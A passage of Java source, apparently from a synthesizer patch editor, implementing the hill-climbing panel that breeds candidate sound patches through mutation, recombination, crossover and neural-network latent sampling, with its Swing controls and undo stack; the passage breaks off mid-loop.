((val / 100.0) * (val / 100.0) * (val / 100.0)) * 100; if (v == 100) return "100.0"; else if (v >= 10.0) return String.format("%.2f", v); else return String.format("%.3f", v); } public void update(String key, Model model) { super.update(key, model); synth.setLastX("" + model.get(key), "ConstrictRate", synth.getClass().getName()); } }; v = INITIAL_CONSTRICT_RATE; if (s != null) try { v = Integer.parseInt(s); } catch (Exception e) { Synth.handleException(e); } if (v < 0 || v > 100) v = INITIAL_CONSTRICT_RATE; constrictRate.setState(v); blank.getModel().set("constrictrate", v); constrictBox.add(constrictRate); vbox = new VBox(); retry = new PushButton("Retry") { public void perform() { again(); resetCurrentPlay(); } }; retry.getButton().setPreferredSize(back.getButton().getPreferredSize()); retry.getButton().setFocusable(false); vbox.add(retry); // add the aforementioned Back up button vbox.add(back); reset = new PushButton("Reset...", new String[] { "From Original Patch", "From Morph", "From Nudge Targets", "From First Four Candidates", "From First Six Candidates" }) { public void perform(int val) { if (method.getSelectedIndex() == 2) // NN Climb { Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end Model model = (val == OPERATION_SEED_FROM_PATCH ? synth.getModel() : val == OPERATION_SEED_FROM_MORPH ? synth.morph.current : null); produceNN(random, keys, weight, model); } else { initialize(val == OPERATION_SEED_FROM_PATCH ? synth.getModel() : val == OPERATION_SEED_FROM_MORPH ? synth.morph.current : null, val); } resetCurrentPlay(); } }; reset.getButton().setPreferredSize(back.getButton().getPreferredSize()); reset.getButton().setFocusable(false); vbox.add(reset); iterationsBox.add(vbox); panel.add(iterationsBox, BorderLayout.CENTER); s = synth.getLastX("HillClimbMethod", synth.getClass().getName()); method.setFont(Style.SMALL_FONT()); method.putClientProperty("JComponent.sizeVariant", "small"); method.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { int m = method.getSelectedIndex(); synth.setLastX("" + m, "HillClimbMethod", synth.getClass().getName()); setMethod(m); } }); v = 0; if (s != null) try { v = Integer.parseInt(s); } catch (Exception e) { Synth.handleException(e); } if (v < 0 || v > 2) v = 0; // clear NN if (v == 2 && !(synth instanceof ProvidesNN)) v = 1; if (v == 0 || v == 2) { outerBox.add(hillClimbBox); } else { outerBox.add(constrictBox); } method.setSelectedIndex(v); JLabel methodLabel = new JLabel("Method: "); methodLabel.setForeground(Style.TEXT_COLOR()); methodLabel.setFont(Style.SMALL_FONT()); methodLabel.putClientProperty("JComponent.sizeVariant", "small"); methodLabel.setOpaque(false); // for windows HBox eb = new HBox(); eb.add(methodLabel); eb.add(method); // we do addLast rather than add to overcome the stupid OS X "Smoo..." bug. bigger = new JCheckBox("Big"); bigger.setFocusable(false); bigger.setOpaque(false); // for windows bigger.setForeground(Style.TEXT_COLOR()); bigger.setFont(Style.SMALL_FONT()); bigger.putClientProperty("JComponent.sizeVariant", "small"); s = synth.getLastX("HillClimbBigger", synth.getClass().getName()); bigger.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { setBigger(bigger.isSelected()); } }); boolean bb = false; if (s != null) try { bb = (s.equals("true")); } catch (Exception e) { Synth.handleException(e); } bigger.setSelected(bb); eb.addLast(bigger); panel.add(eb, BorderLayout.NORTH); toprow.add(panel); panel = new Category(null, "Archive", Style.COLOR_A()); HBox hbox = new HBox(); panel.add(hbox); for(int i = 0; i < ARCHIVE_SIZE; i++) { vbox = buildCandidate(NUM_CANDIDATES + i); hbox.add(vbox); } panel.add(hbox); toprow.addLast(panel); top.add(toprow); // Add Candidates panel = new Category(null, "Candidates", Style.COLOR_B()); hbox = new HBox(); candidates = new VBox(); for(int i = 0; i < NUM_CANDIDATES; i++) { vbox = buildCandidate(i); hbox.add(vbox); if (i % 8 == 7) { VBox vv = new VBox(); if (i != 7) vv.add(Strut.makeVerticalStrut(20)); vv.add(hbox); hbox = new HBox(); if (i == 23) extraCandidates1 = vv; else if (i == 31) extraCandidates2 = vv; else candidates.add(vv); } } panel.add(candidates, BorderLayout.WEST); HBox hb = new HBox(); hb.add(panel); VBox currentAndNone = new VBox(); // Add Current panel = new Category(null, "Current", Style.COLOR_C()); vbox = buildCandidate(NUM_MODELS - 1); HBox currentHBox = new HBox(); currentHBox.add(vbox); panel.add(currentHBox); currentAndNone.add(panel); // Add None panel = new Category(null, "None", Style.COLOR_C()); vbox = new VBox(); Box b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[NUM_MODELS][0] = new JRadioButton("1")); ratings[NUM_MODELS][0].setFocusable(false); ratings[NUM_MODELS][0].setForeground(Style.TEXT_COLOR()); ratings[NUM_MODELS][0].setFont(Style.SMALL_FONT()); ratings[NUM_MODELS][0].putClientProperty("JComponent.sizeVariant", "small"); ratings[NUM_MODELS][0].setOpaque(false); // for windows b.add(Box.createGlue()); vbox.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[NUM_MODELS][1] = new JRadioButton("2")); ratings[NUM_MODELS][1].setFocusable(false); ratings[NUM_MODELS][1].setForeground(Style.TEXT_COLOR()); ratings[NUM_MODELS][1].setFont(Style.SMALL_FONT()); ratings[NUM_MODELS][1].putClientProperty("JComponent.sizeVariant", "small"); ratings[NUM_MODELS][1].setOpaque(false); // for windows b.add(Box.createGlue()); vbox.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[NUM_MODELS][2] = new JRadioButton("3")); ratings[NUM_MODELS][2].setFocusable(false); ratings[NUM_MODELS][2].setForeground(Style.TEXT_COLOR()); ratings[NUM_MODELS][2].setFont(Style.SMALL_FONT()); ratings[NUM_MODELS][2].putClientProperty("JComponent.sizeVariant", "small"); ratings[NUM_MODELS][2].setOpaque(false); // for windows b.add(Box.createGlue()); vbox.add(b); VBox bar = new VBox(); bar.addBottom(vbox); HBox foo = new HBox(); foo.add(bar); foo.add(Strut.makeHorizontalStrut(40)); panel.add(foo); currentAndNone.add(panel); hb.addLast(currentAndNone); top.add(hb); for(int i = 0; i < ratings.length; i++) { one.add(ratings[i][0]); two.add(ratings[i][1]); three.add(ratings[i][2]); } for(int i = NUM_CANDIDATES; i < NUM_CANDIDATES + ARCHIVE_SIZE; i++) { currentModels[i] = (Model)(synth.getModel().clone()); } currentModels[NUM_CANDIDATES + ARCHIVE_SIZE] = synth.getModel(); setMethod(method.getSelectedIndex()); setBigger(bb); } public void setBigger(boolean bigger) { candidates.remove(extraCandidates1); candidates.remove(extraCandidates2); if (bigger) { candidates.add(extraCandidates1); candidates.add(extraCandidates2); } candidates.revalidate(); candidates.repaint(); synth.setLastX("" + bigger, "HillClimbBigger", synth.getClass().getName()); } public static final int UPDATE_SOUND_RATE = 1; int updateSoundTick = 0; Model backup = null; boolean isShowingPane() { return (synth.hillClimbPane != null && synth.tabs.getSelectedComponent() == synth.hillClimbPane); } public void updateSound() { updateSoundTick++; if (updateSoundTick >= UPDATE_SOUND_RATE) updateSoundTick = 0; if (updateSoundTick == 0) { if (isShowingPane()) { for(int i = 0; i < NUM_MODELS; i++) { plays[i].getButton().setForeground(new JButton().getForeground()); plays[i].getButton().setText(titleForButton(i)); } if (temporaryPlay >= 0) { plays[temporaryPlay].getButton().setForeground(Color.RED); plays[temporaryPlay].getButton().setText("<HTML><B>" + titleForButton(temporaryPlay) + "</b></HTML>"); backup = synth.model; synth.model = currentModels[temporaryPlay]; synth.sendAllParameters(); temporaryPlay = -1; } else { currentPlay++; if (currentPlay >= NUM_CANDIDATES || currentPlay >= 16 && !bigger.isSelected()) currentPlay = 0; plays[currentPlay].getButton().setForeground(Color.RED); plays[currentPlay].getButton().setText("<HTML><B>" + titleForButton(currentPlay) + "</b></HTML>"); // change the model, send all parameters, maybe play a note, // and then restore the model. backup = synth.model; synth.model = currentModels[currentPlay]; synth.sendAllParameters(); } } } } void setMethod(int method) { boolean c = (method == 0 || method == 2); climb.getButton().setEnabled(c); constrict.getButton().setEnabled(!c); for(int i = 0; i < ratings.length; i++) for(int j = 0; j < ratings[i].length; j++) if (ratings[i][j] != null) ratings[i][j].setEnabled(c); for(int i = 0; i < selected.length; i++) if (selected[i] != null) selected[i].setEnabled(!c); hillClimbRate.setEnabled(c); constrictRate.setEnabled(!c); this.method.setSelectedIndex(method); outerBox.removeAll(); if (method == 0 || method == 2) { outerBox.add(hillClimbBox); } else { outerBox.add(constrictBox); } outerBox.revalidate(); repaint(); } int lastPlayedSound() { if (temporaryPlay >=0) return temporaryPlay; else return currentPlay; } public void postUpdateSound() { repaint(); if (backup != null) synth.model = backup; backup = null; } boolean startedUp = false; public void startup() { if (!startedUp) { resetCurrentPlay(); if (!synth.isSendingTestNotes() && synth.morphTestNotes) { synth.doSendTestNotes(); } } startedUp = true; } public void shutdown() { if (startedUp) { synth.doSendAllSoundsOff(false); if (synth.isSendingTestNotes()) { synth.doSendTestNotes(); } if (synth.isRepeatingCurrentPatch()) { synth.doRepeatCurrentPatch(); } // restore patch synth.sendAllParameters(); } startedUp = false; } public void resetCurrentPlay() { currentPlay = NUM_CANDIDATES - 1; temporaryPlay = -1; } Model copy(Model model) { if (model != null) return model.copy(); else return null; } void again() { if (stackEmpty()) { // uh oh... System.err.println("Warning (HillClimb): " + "Empty Stack"); return; } else if (operation == OPERATION_SEED_FROM_PATCH) { initialize(synth.getModel(), operation); } else if (operation == OPERATION_SEED_FROM_NUDGE || operation == OPERATION_SEED_FROM_FOUR || operation == OPERATION_SEED_FROM_SIX) { initialize(null, operation); } else if (operation == OPERATION_CLIMB) { /* // reset ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); State state = popStack(); System.arraycopy(state.children, 0, currentModels, 0, state.children.length); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) { ratings[state.parentIndices[j]][j].setSelected(true); } } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } */ pop(); climb(); } else if (operation == OPERATION_CONSTRICT) { /* State state = popStack(); System.arraycopy(state.children, 0, currentModels, 0, state.children.length); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) ratings[state.parentIndices[j]][j].setSelected(true); } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } */ pop(); constrict(); } else if (operation == OPERATION_CLIMB_NN) { /* // reset ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); State state = popStack(); System.arraycopy(state.children, 0, currentModels, 0, state.children.length); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) { ratings[state.parentIndices[j]][j].setSelected(true); } } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } */ pop(); climbNN(); } } void pop() { if (stackEmpty()) { // uh oh... System.err.println("Warning (HillClimb) 2: " + "Empty Stack"); return; } else if (stackInitial()) { // do nothing ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); } else { ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); State state = popStack(); operation = state.operation; System.arraycopy(state.children, 0, currentModels, 0, state.children.length); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) { //System.err.println("Setting " + state.parentIndices[j] + " to " + j); ratings[state.parentIndices[j]][j].setSelected(true); } } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } iterations.setName("Iteration " + stack.size()); repaint(); } } public void startHillClimbing() { for(int i = NUM_CANDIDATES; i < NUM_CANDIDATES + ARCHIVE_SIZE; i++) { currentModels[i] = (Model)(synth.getModel().clone()); } currentModels[NUM_CANDIDATES + ARCHIVE_SIZE] = synth.getModel(); if (method.getSelectedIndex() == 2) { //System.out.println(method.getSelectedIndex()); Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end produceNN(random, keys, weight, synth.getModel()); } else { initialize(synth.getModel(), OPERATION_SEED_FROM_PATCH); } } boolean[] getSelectedResults() { boolean[] sel = new boolean[NUM_CANDIDATES]; for(int i = 0; i < sel.length; i++) { sel[i] = selected[i].isSelected(); } return sel; } void initialize(Model seed, int operation) { // we need a model with NO callbacks stack.clear(); this.operation = operation; Random random = synth.random; String[] keys = synth.getMutationKeys(); switch(operation) { case OPERATION_SEED_FROM_PATCH: // Fall Thru case OPERATION_SEED_FROM_MORPH: { Model newSeed = seed.copy(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end int numMutations = 1; for(int i = 0; i < NUM_CANDIDATES; i++) { currentModels[i] = newSeed.copy(); for(int j = 0; j < numMutations; j++) currentModels[i] = currentModels[i].mutate(random, keys, weight); if (i % 4 == 3) numMutations++; } for(int i = 0; i < selected.length; i++) selected[i].setSelected(true); } break; case OPERATION_SEED_FROM_NUDGE: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; for(int i = 0; i < 4; i++) currentModels[i] = (Model)(synth.nudge[i].clone()); int m = 4; for(int i = 0; i < 4; i++) for(int j = 0; j < 4; j++) { if (j == i) continue; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } // fill the next 16 for(int i = 16; i < 32; i++) { // pick two parents, try to make them different from one another int p1 = random.nextInt(16); int p2 = 0; for(int j = 0; j < 100; j++) { p2 = random.nextInt(16); if (p2 != p1) break; } currentModels[i] = currentModels[p1].copy().crossover(random, currentModels[p1], keys, weight); } } break; case OPERATION_SEED_FROM_FOUR: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; int m = 4; for(int i = 0; i < 4; i++) for(int j = 0; j < 4; j++) { if (j == i) continue; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } // fill the next 16 for(int i = 16; i < 32; i++) { // pick two parents, try to make them different from one another int p1 = random.nextInt(16); int p2 = 0; for(int j = 0; j < 100; j++) { p2 = random.nextInt(16); if (p2 != p1) break; } currentModels[i] = currentModels[p1].copy().crossover(random, currentModels[p1], keys, weight); } } break; case OPERATION_SEED_FROM_SIX: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; int m = 6; for(int i = 0; i < 6; i++) for(int j = 0; j < 6; j++) { if (j == i) continue; if (m >= 32) break; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } } break; case OPERATION_SEED_FROM_LIBRARIAN: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; int column = synth.librarian.getCurrentColumn(); int row = synth.librarian.getCurrentRow(); int len = synth.librarian.getCurrentLength(); if (len == 0) return; for(int i = 0; i < Math.min(len, 32); i++) { currentModels[i] = (Model)(synth.librarian.getModel(row + i, column).clone()); } int m = len; for(int i = 0; i < 6; i++) for(int j = 0; j < 6; j++) { if (j == i) continue; if (m >= 32) break; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } } break; } pushStack(new int[] {-1, -1, -1}, new Model[] { seed, null, null }, getSelectedResults(), currentModels); iterations.setName("Iteration " + stack.size()); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); repaint(); } void shuffle(Random random, Model[] array, int start, int len) { for (int i = len - 1; i > 0; i--) { int index = random.nextInt(i + 1); Model temp = array[start + index]; array[start + index] = array[start + i]; array[start + i] = temp; } } void produceNN(Random random, String[] keys, double weight, Model a) { if(a.latentVector == null) { a.latentVector = ((ProvidesNN)synth).encode(a); } for(int i = 0; i < NUM_CANDIDATES; i++) { // A currentModels[i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); } shuffle(random, currentModels, 0, NUM_CANDIDATES); } void produceNN(Random random, String[] keys, double weight, Model a, Model b) { int numStages = NUM_CANDIDATES / STAGE_SIZE; if(a.latentVector == null) { a.latentVector = ((ProvidesNN)synth).encode(a); } if(b.latentVector == null) { b.latentVector = ((ProvidesNN)synth).encode(b); } for(int j = 0; j < numStages; j++) { for(int i = 0; i < STAGE_SIZE/2; i++) { // A currentModels[j*STAGE_SIZE + i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); } for(int i = STAGE_SIZE/2; i < 3*STAGE_SIZE/4; i++) { // B currentModels[j*STAGE_SIZE + i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); } for(int i = 3*STAGE_SIZE/4; i < STAGE_SIZE; i++) { // C currentModels[j*STAGE_SIZE + i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); } } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produceNN(Random random, String[] keys, double weight, Model a, Model b, Model c) { int numStages = NUM_CANDIDATES / STAGE_SIZE; if(a.latentVector == null) { a.latentVector = ((ProvidesNN)synth).encode(a); } if(b.latentVector == null) { b.latentVector = ((ProvidesNN)synth).encode(b); } if(c.latentVector == null) { c.latentVector = ((ProvidesNN)synth).encode(c); } for(int j = 0; j < numStages; j++) { // A currentModels[j*STAGE_SIZE + 0] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 1] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 2] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 3] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); // B currentModels[j*STAGE_SIZE + 4] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 5] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 6] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); // C currentModels[j*STAGE_SIZE + 7] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(c.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 8] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(c.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(A, B) currentModels[j*STAGE_SIZE + 9] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 10] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(A, C) currentModels[j*STAGE_SIZE + 11] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 12] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(B, C) currentModels[j*STAGE_SIZE + 13] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(b.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 14] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(b.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(A,B,C) currentModels[j*STAGE_SIZE + 15] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } public static final double MUTATION_WEIGHT = 1.0; void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model c, Model oldA) { int numStages = NUM_CANDIDATES / STAGE_SIZE; for(int i = 0; i < numStages; i++) { produce(random, keys, recombination, weight, a, b, c, oldA, i * STAGE_SIZE); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model c, Model oldA, int stage) { double mutationWeight = (stage/STAGE_SIZE + 1) * MUTATION_WEIGHT * weight; // A + B currentModels[stage + 0] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight); // A + C currentModels[stage + 1] = a.copy().recombine(random, c, keys, recombination).mutate(random, keys, mutationWeight); // A + (B + C) currentModels[stage + 2] = a.copy().recombine(random, b.copy().recombine(random, c, keys, recombination), keys, recombination).mutate(random, keys, mutationWeight); // A - B currentModels[stage + 3] = a.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - C currentModels[stage + 4] = a.copy().opposite(random, c, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A currentModels[stage + 5] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B currentModels[stage + 6] = b.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // C currentModels[stage + 7] = c.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); if ((stage + 8) < currentModels.length) { // A - Z currentModels[stage + 8] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); // B - A currentModels[stage + 9] = b.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // C - A currentModels[stage + 10] = c.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - C currentModels[stage + 11] = b.copy().opposite(random, c, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // C - B currentModels[stage + 12] = c.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - Z currentModels[stage + 13] = b.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); // C - Z currentModels[stage + 14] = c.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); // B + C currentModels[stage + 15] = b.copy().recombine(random, c, keys, recombination).mutate(random, keys, mutationWeight); } } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model oldA) { int numStages = NUM_CANDIDATES / STAGE_SIZE; for(int i = 0; i < numStages; i++) { produce(random, keys, recombination, weight, a, b, oldA, i * STAGE_SIZE); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model oldA, int stage) { double mutationWeight = (stage/STAGE_SIZE + 1) * MUTATION_WEIGHT * weight; // A + B currentModels[stage + 0] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight); currentModels[stage + 1] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 2] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - B currentModels[stage + 3] = a.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 4] = a.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - A currentModels[stage + 5] = b.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 6] = b.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - Z currentModels[stage + 7] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); if ((stage + 8) < currentModels.length) { currentModels[stage + 8] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - Z currentModels[stage + 9] = b.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); currentModels[stage + 10] = b.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // (A - Z) + (B - Z) currentModels[stage + 11] = a.copy().opposite(random, oldA, keys, recombination, false).recombine(random, b.copy().opposite(random, oldA, keys, recombination, false), keys, recombination).mutate(random, keys, mutationWeight); // A currentModels[stage + 12] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 13] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B currentModels[stage + 14] = b.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 15] = b.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); } } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model oldA) { int numStages = NUM_CANDIDATES / STAGE_SIZE; for(int i = 0; i < numStages; i++) { produce(random, keys, recombination, weight, a, oldA, i * STAGE_SIZE); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model oldA, int stage) { double mutationWeight = (stage/STAGE_SIZE + 1) * MUTATION_WEIGHT * weight; // A currentModels[stage + 0] = a.copy().mutate(random, keys, mutationWeight); currentModels[stage + 1] = a.copy().mutate(random, keys, mutationWeight); currentModels[stage + 2] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 3] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 4] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 5] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 6] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 7] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); if ((stage + 8) < currentModels.length) { currentModels[stage + 8] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 9] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 10] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 11] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 12] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - Z currentModels[stage + 13] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); currentModels[stage + 14] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 15] = a.copy().opposite(random, oldA, keys, recombination, false).opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); } } void constrict() { int poolSize= (bigger.isSelected() ? NUM_CANDIDATES : STAGE_SIZE); // that is, 32 vs 16 Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("constrictrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end // Identify the individuals to replace and the ones to keep int numToReplace = 0; for(int i = 0; i < selected.length; i++) { if (!selected[i].isSelected()) numToReplace++; } int[] replace = new int[numToReplace]; int[] keep = new int[poolSize - numToReplace]; if (replace.length == 0 || keep.length == 0) return; int k = 0; int r = 0; for(int i = 0; i < poolSize; i++) { if (selected[i].isSelected()) keep[k++] = i; else replace[r++] = i; } pushStack(new int[] { -1, -1, -1 }, new Model[] { currentModels[NUM_CANDIDATES - 1], null, null }, getSelectedResults(), currentModels); operation = OPERATION_CONSTRICT; // Now replace the individuals for(int i = 0; i < replace.length; i++) { // pick two parents, try to make them different from one another int p1 = random.nextInt(keep.length); int p2 = 0; for(int j = 0; j < 100; j++) { 